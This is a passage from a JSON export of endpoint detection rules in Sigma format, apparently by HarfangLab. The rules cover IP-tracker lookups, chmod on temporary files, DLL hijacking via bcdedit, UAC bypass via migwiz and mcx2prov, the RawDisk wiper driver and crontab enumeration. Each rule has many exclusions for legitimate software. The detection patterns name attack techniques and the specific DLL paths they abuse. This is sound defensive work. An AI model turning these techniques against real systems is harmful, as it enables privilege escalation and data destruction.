'?:\\Users\\\\*\\AppData\\Local\\Programs\\station-desktop-app\\station.exe'\n - '?:\\Program Files (x86)\\evernote\\evernote.exe'\n - '?:\\Program Files\\dolphin anty\\dolphin anty.exe'\n - '?:\\Program Files (x86)\\echtherm\\fscommand\\\\*.exe'\n - '?:\\Program Files\\mercury\\mercury.exe'\n - '?:\\Program Files (x86)\\ajax pro desktop\\ajaxpro.exe'\n - '?:\\program Files\\Chromium\\Application\\chrome.exe'\n\n exclusion_insanermm:\n ProcessImage: '?:\\Program Files\\InsaneRMM\\InsaneRMM.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_httpd:\n ProcessCommandLine: '?:\\Apache24\\bin\\httpd.exe -d ?:/Apache24'\n ProcessParentCommandLine: '?:\\Apache24\\bin\\httpd.exe -k runservice'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6f370d2a-b65a-4e09-a924-93832490b998",
"rule_name": "DNS Request to IP Trackers from Unsigned Process",
"rule_description": "Detects a connection to an IP address tracker service such as ipinfo.io from an unsigned process.\nAdversaries can use such services to monitor their malware's spreading and track the IP addresses of infected hosts.\nIt is recommended to check the legitimacy of the process performing the request as well as its parent.\n",
"rule_creation_date": "2023-06-19",
"rule_modified_date": "2025-01-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6f41b447-3247-40d8-a860-f66a138a0ed4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094001Z",
"creation_date": "2026-03-23T11:45:34.094003Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094008Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://atomicredteam.io/execution/T1059.004/",
"https://gtfobins.github.io/gtfobins/chmod/",
"https://attack.mitre.org/techniques/T1222/002/"
],
"name": "t1222_002_chmod_executable_in_temporary_folder.yml",
"content": "title: Execution Permission of a Temporary File Set via chmod\nid: 6f41b447-3247-40d8-a860-f66a138a0ed4\ndescription: |\n Detects a suspicious attempt to give the execution permissions to a temporary file using the chmod command.\n This is often used by attackers to give execution permission to their malicious tools, either compiled locally or downloaded from the internet.\n It is recommended to investigate the file to determine its legitimacy.\nreferences:\n - https://atomicredteam.io/execution/T1059.004/\n - https://gtfobins.github.io/gtfobins/chmod/\n - https://attack.mitre.org/techniques/T1222/002/\ndate: 2024/06/19\nmodified: 2025/10/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.defense_evasion\n - attack.t1222.002\n - classification.Linux.Source.Filesystem\n - classification.Linux.LOLBin.Chmod\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'chmod'\n Mode|endswith: '7??'\n ProcessImage|endswith: '/chmod'\n ProcessCommandLine:\n - '*chmod ?7?? *'\n - '*chmod +x *'\n Path|startswith:\n - '/tmp'\n - '/var/tmp'\n\n filter_directories:\n Path|endswith: '/'\n\n filter_recursive:\n ProcessCommandLine|contains: ' -R '\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/usr/sbin/crond|'\n - '|/usr/bin/crio|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/opt/teamquest/manager/'\n - '|/opt/BESClient/bin/BESClient|'\n - '|/usr/local/lsam-*/bin/sma_lsam|'\n - '|/opt/*/smgr/bin/ucybsmgr|'\n - '|/usr/bin/make|'\n\n exclusion_mkinitramfs:\n # cp -pP /bin/kbd_mode /var/tmp/mkinitramfs_2yUr1t//bin/kbd_mode\n # /var/tmp/dracut.2V0kBT/initramfs/kdumpscripts/monitor_dd_progress\n ProcessCommandLine|contains:\n - ' /var/tmp/mkinitramfs_??????/'\n - ' /var/tmp/dracut.??????/initramfs/'\n\n exclusion_mcaffee:\n ProcessCommandLine|contains: ' /tmp/ens_pkg/validate-mfeesp.sh'\n\n exclusion_apt:\n ProcessGrandparentImage: '/usr/lib/apt/methods/gpgv'\n\n exclusion_nxserver:\n ProcessGrandparentImage: '/usr/NX/bin/nxserver.bin'\n\n exclusion_gh_runner:\n ProcessParentCommandLine|startswith: '/bin/bash /root/gh-runner-scripts/'\n\n exclusion_puppetlab:\n - ProcessGrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessAncestors|contains: '|/opt/puppetlabs/puppet/bin/ruby|'\n\n exclusion_dispatch:\n Path:\n - '/tmp/*-dispatch-script.tmp.sh'\n - '/var/tmp/*-dispatch-script.tmp.sh'\n - '/tmp/*-dispatch-script.tmp.py'\n - '/var/tmp/*-dispatch-script.tmp.py'\n\n exclusion_veeam_1:\n Path:\n - '/tmp/VeeamAgent????????-????-????-????-????????????'\n - '/tmp/VeeamApp_????????-????-????-????-????????????'\n\n exclusion_veeam_2:\n # sudo -S -k -p VEEAM_PWD_PROMPT chmod 0766 /tmp/4d62246d-fccb-4f29-a9e7-8d094bd65bde\n # sudo -S -k -p VEEAM_PWD_PROMPT chmod 0766 /tmp/vindexing_c2c3dca7-ea7a-4ccc-af59-80babb9bcfaf/temp_ada23dab-bdd2-497a-aecf-ef0c3344ef80/summary.txt\n ProcessParentCommandLine|contains: 'VEEAM_PWD_PROMPT'\n\n exclusion_ansible:\n Path|contains:\n - '/tmp/ansible-tmp-*/'\n - '/tmp/.ansible-tmp-*/'\n\n exclusion_nakivo:\n ProcessParentImage: '/opt/nakivo/director/jre/bin/java'\n\n # A lot of build systems execute test binaries\n exclusion_make:\n - ProcessParentImage: '/usr/bin/make'\n - ProcessGrandparentImage: '/usr/bin/make'\n\n exclusion_timeshift:\n ProcessParentImage: '/usr/bin/timeshift'\n\n exclusion_mag2:\n ProcessParentCommandLine|startswith: '/bin/ksh /m2/appli/'\n\n exclusion_xpipe:\n ProcessParentImage: '/opt/xpipe/app/bin/xpiped'\n\n exclusion_containerd:\n ProcessGrandparentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n\n exclusion_docker:\n ProcessAncestors|contains: '|/usr/bin/runc|/usr/bin/dockerd|'\n\n exclusion_git:\n ProcessGrandparentImage: '/usr/lib/git-core/git'\n\n exclusion_netdata:\n ProcessCommandLine:\n - 'chmod +x ./netdata-updater.sh'\n - 'chmod +x /tmp/netdata-test.*'\n ProcessParentCommandLine:\n - 'bash /etc/cron.daily/netdata-updater'\n - '/bin/sh /etc/cron.daily/netdata-updater'\n - '/bin/sh ./netdata-updater.sh '\n - '/bin/sh /tmp/netdata-updater-*/netdata-updater.sh *'\n - '/bin/sh ./netdata-installer.sh --auto-update *'\n\n exclusion_bootstrap:\n ProcessCommandLine: 'chmod 0700 /tmp/.sudo_bootstrap????????-????-????-????-????????????.sh'\n ProcessParentImage: '/usr/sbin/sshd'\n\n exclusion_install_java:\n ProcessParentCommandLine: '/bin/sh -x /tmp/cbe.*'\n ProcessGrandparentImage: '/tmp/install.dir.*/Linux/resource/jre/bin/java'\n\n exclusion_pyenv:\n ProcessCommandLine:\n - 'chmod +x ./config.status'\n - 'chmod +x /tmp/python-build-test.*'\n - 'chmod +x Modules/ld_so_aix'\n\n exclusion_kettle:\n ProcessCommandLine: 'chmod +x /tmp/kettle_*shell'\n ProcessParentImage|endswith: '/bin/java'\n\n exclusion_tabletopesimulator:\n ProcessCommandLine:\n - 'chmod +x libtool'\n - 'chmod +x config.nice'\n ProcessParentCommandLine:\n - '/bin/bash /tmp/pear/temp/*'\n - '/bin/bash ./config.status'\n - '/bin/bash ./config.status --quiet'\n\n exclusion_crio:\n ProcessCommandLine: 'chmod +x /tmp/k8star'\n ProcessGrandparentCommandLine|startswith: /usr/bin/crio-crun --root /run/crun '\n\n exclusion_android-studio:\n ProcessCommandLine: 'chmod +x /tmp/shunit.*'\n ProcessAncestors|contains: '|/snap/android-studio/*/jbr/bin/java|'\n\n # Rundeck or Ansible\n exclusion_rundeck:\n ProcessCommandLine:\n - 'chmod +x /tmp/?????????????-*-dispatch-script.sh'\n - 'chmod +x /tmp/*-*-*.temp.sh'\n - 'chmod +x /tmp/*-*-*-*.temp.py'\n ProcessParentImage: '/usr/sbin/sshd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6f41b447-3247-40d8-a860-f66a138a0ed4",
"rule_name": "Execution Permission of a Temporary File Set via chmod",
"rule_description": "Detects a suspicious attempt to give the execution permissions to a temporary file using the chmod command.\nThis is often used by attackers to give execution permission to their malicious tools, either compiled locally or downloaded from the internet.\nIt is recommended to investigate the file to determine its legitimacy.\n",
"rule_creation_date": "2024-06-19",
"rule_modified_date": "2025-10-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1222.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6f5ae5e9-afd3-47d8-8c09-3cf9e6889852",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592020Z",
"creation_date": "2026-03-23T11:45:34.592023Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592031Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bcdedit.yml",
"content": "title: DLL Hijacking via bcdedit.exe\nid: 6f5ae5e9-afd3-47d8-8c09-3cf9e6889852\ndescription: |\n Detects potential Windows DLL Hijacking via bcdedit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bcdedit.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\cryptsp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6f5ae5e9-afd3-47d8-8c09-3cf9e6889852",
"rule_name": "DLL Hijacking via bcdedit.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bcdedit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6f6e37f2-2f9d-4b37-9d9a-74ed25de6333",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092900Z",
"creation_date": "2026-03-23T11:45:34.092902Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092906Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://null-byte.wonderhowto.com/how-to/bypass-uac-using-dll-hijacking-0168600/"
],
"name": "t1548_002_uac_bypass_migwiz_mcx2prov.yml",
"content": "title: UAC Bypass Executed via migwiz and mcx2prov\nid: 6f6e37f2-2f9d-4b37-9d9a-74ed25de6333\ndescription: |\n Detects the migwiz.exe and mcx2prov.exe DLL hijacking UAC bypasses.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the origin of the loaded DLL and to analyze its content.\nreferences:\n - https://null-byte.wonderhowto.com/how-to/bypass-uac-using-dll-hijacking-0168600/\ndate: 2020/10/15\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image:\n - '?:\\Windows\\ehome\\mcx2prov.exe'\n - '?:\\Windows\\System32\\migwiz\\migwiz.exe'\n ImageLoaded:\n - '?:\\Windows\\System32\\migwiz\\CryptBase.dll'\n - '?:\\Windows\\System32\\migwiz\\CryptSP.dll'\n - '?:\\Windows\\System32\\migwiz\\WdsCore.dll'\n filter_signed:\n Signed: 'true'\n Signature|contains: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6f6e37f2-2f9d-4b37-9d9a-74ed25de6333",
"rule_name": "UAC Bypass Executed via migwiz and mcx2prov",
"rule_description": "Detects the migwiz.exe and mcx2prov.exe DLL hijacking UAC bypasses.\nAttackers may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the origin of the loaded DLL and to analyze its content.\n",
"rule_creation_date": "2020-10-15",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6fcaf0dc-8bb7-4983-9d14-46f71839bbb5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609459Z",
"creation_date": "2026-03-23T11:45:34.609462Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609470Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/",
"https://attack.mitre.org/software/S0364/",
"https://attack.mitre.org/techniques/T1561/001/"
],
"name": "t1561_001_rawdsk3_dangerous_driver_loading.yml",
"content": "title: EldoS RawDisk 3 Dangerous Driver Loaded\nid: 6fcaf0dc-8bb7-4983-9d14-46f71839bbb5\ndescription: |\n Detects the loading of the EldoS RawDisk 3 driver.\n This driver has been used in the July 2022 Iranian attacks against the Albanian government in order to wipe drives.\n It is recommended to investigate the activity on the endpoint near the driver loading to identify the process responsible for the driver creation and load.\nreferences:\n - https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/\n - https://attack.mitre.org/software/S0364/\n - https://attack.mitre.org/techniques/T1561/001/\ndate: 2022/09/19\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.s0364\n - attack.impact\n - attack.t1561.001\n - attack.t1561.002\n - attack.t1485\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.Deletion\nlogsource:\n product: windows\n category: driver_load\ndetection:\n selection:\n - DriverSha256: '3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6'\n - OriginalFileName: 'rawdsk3.sys'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6fcaf0dc-8bb7-4983-9d14-46f71839bbb5",
"rule_name": "EldoS RawDisk 3 Dangerous Driver Loaded",
"rule_description": "Detects the loading of the EldoS RawDisk 3 driver.\nThis driver has been used in the July 2022 Iranian attacks against the Albanian government in order to wipe drives.\nIt is recommended to investigate the activity on the endpoint near the driver loading to identify the process responsible for the driver creation and load.\n",
"rule_creation_date": "2022-09-19",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1485",
"attack.t1561.001",
"attack.t1561.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ff809b3-cedd-40bd-ad93-37e4dc9da8ab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.764406Z",
"creation_date": "2026-03-23T11:45:35.294785Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294789Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_crontab_list_linux.yml",
"content": "title: Cron Jobs Enumerated via Crontab (Linux)\nid: 6ff809b3-cedd-40bd-ad93-37e4dc9da8ab\ndescription: |\n Detects the execution of the crontab command to list all cron jobs.\n An attacker can use the list of cron jobs to inject malicious behavior into unprotected scripts.\n It is recommended to look for other malicious actions taken by the ancestors of crontab and to investigate the execution context to determine the legitimacy of this action.\nreferences:\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1053.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Crontab\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/crontab'\n CommandLine:\n - 'crontab -l'\n - '/bin/crontab -l'\n - '/usr/bin/crontab -l'\n # Filter-out missing parents\n ParentImage|contains: '?'\n\n exclusion_commandline:\n ParentCommandLine|startswith:\n - 'ksh /oradata/'\n - 'ksh /opt/mysql/bin/'\n - 'bash /opt/mysql/bin/'\n - 'ksh /opt/pgsql/bin/'\n - 'bash /opt/pgsql/bin/'\n\n exclusion_plesk:\n ParentImage:\n - '/usr/local/psa/admin/sbin/wrapper'\n - '/usr/local/psa/admin/sbin/crontabmng'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_ansible_script:\n - CommandLine|endswith: '/AnsiballZ_cron.py'\n - ParentCommandLine|endswith:\n - '/AnsiballZ_cron.py'\n - '/AnsiballZ_command.py'\n\n exclusion_netbackup:\n GrandparentCommandLine:\n - '/usr/openv/netbackup/bin/bprd'\n - '/usr/openv/netbackup/bin/nbpas'\n\n exclusion_puppet:\n - ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - GrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_puppet_agent:\n - ParentCommandLine|startswith: '/usr/bin/ruby /usr/bin/puppet agent '\n - GrandparentCommandLine|startswith: '/usr/bin/ruby /usr/bin/puppet agent '\n\n exclusion_timeshift:\n - ParentImage:\n - '/usr/bin/timeshift'\n - '/usr/bin/timeshift-gtk'\n - ParentCommandLine: '/bin/bash -c timeshift --check --scripted'\n\n exclusion_sosreport:\n - GrandparentCommandLine: '/usr/bin/python /usr/sbin/sosreport'\n - GrandparentCommandLine|startswith: '/usr/bin/python /usr/sbin/sosreport '\n\n exclusion_chrootkit:\n - ParentCommandLine: '/bin/sh /usr/sbin/chkrootkit'\n - GrandparentCommandLine: '/bin/sh /usr/sbin/chkrootkit'\n\n exclusion_crontabmng:\n - ParentImage: '/opt/psa/admin/bin/crontabmng'\n - GrandparentImage: '/opt/psa/admin/bin/crontabmng'\n\n exclusion_insights_client:\n ParentImage: '/usr/bin/timeout'\n GrandparentCommandLine|contains:\n - '/site-packages/insights_client/run.py'\n - '/bin/insights-client-run'\n - '/bin/redhat-access-insights'\n\n exclusion_qualys:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_crond:\n - GrandparentCommandLine: '/usr/sbin/crond -n'\n - Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_oneautomation:\n ProcessAncestors|contains: '|/opt/oneautomation/*/smgr/bin/ucybsmgr|'\n\n exclusion_postgres:\n ProcessCommandLine: 'crontab -u postgres -l'\n ProcessCurrentDirectory: '/var/lib/pgcluu/data/'\n\n exclusion_wazuh:\n ProcessImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_containerd:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_ssh:\n - GrandparentImage:\n - '/usr/sbin/sshd'\n - '/usr/lib/openssh/sshd-session'\n - '/usr/local/sbin/sshd'\n - GrandparentImage:\n - '/bin/su'\n - '/usr/bin/su'\n - '/usr/bin/sudo'\n Ancestors|contains:\n - '|/usr/sbin/sshd|'\n - '|/usr/lib/openssh/sshd-session|'\n - '|/usr/local/sbin/sshd|'\n\n # Open Monitoring Distribution (OMD)\n exclusion_omd:\n CurrentDirectory|startswith:\n - '/opt/omd/sites/'\n - '/data/omd/sites/'\n ParentCommandLine: '/bin/bash /omd/sites/*/etc/rc.d/99-crontab status'\n\n exclusion_nagios:\n GrandparentCommandLine|startswith: 'bash -c /usr/local/nagios/libexec/check_'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ff809b3-cedd-40bd-ad93-37e4dc9da8ab",
"rule_name": "Cron Jobs Enumerated via Crontab (Linux)",
"rule_description": "Detects the execution of the crontab command to list all cron jobs.\nAn attacker can use the list of cron jobs to inject malicious behavior into unprotected scripts.\nIt is recommended to look for other malicious actions taken by the ancestors of crontab and to investigate the execution context to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7011ac8f-bfbe-4598-b846-eef8d866ebc7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088216Z",
"creation_date": "2026-03-23T11:45:34.088219Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088223Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine",
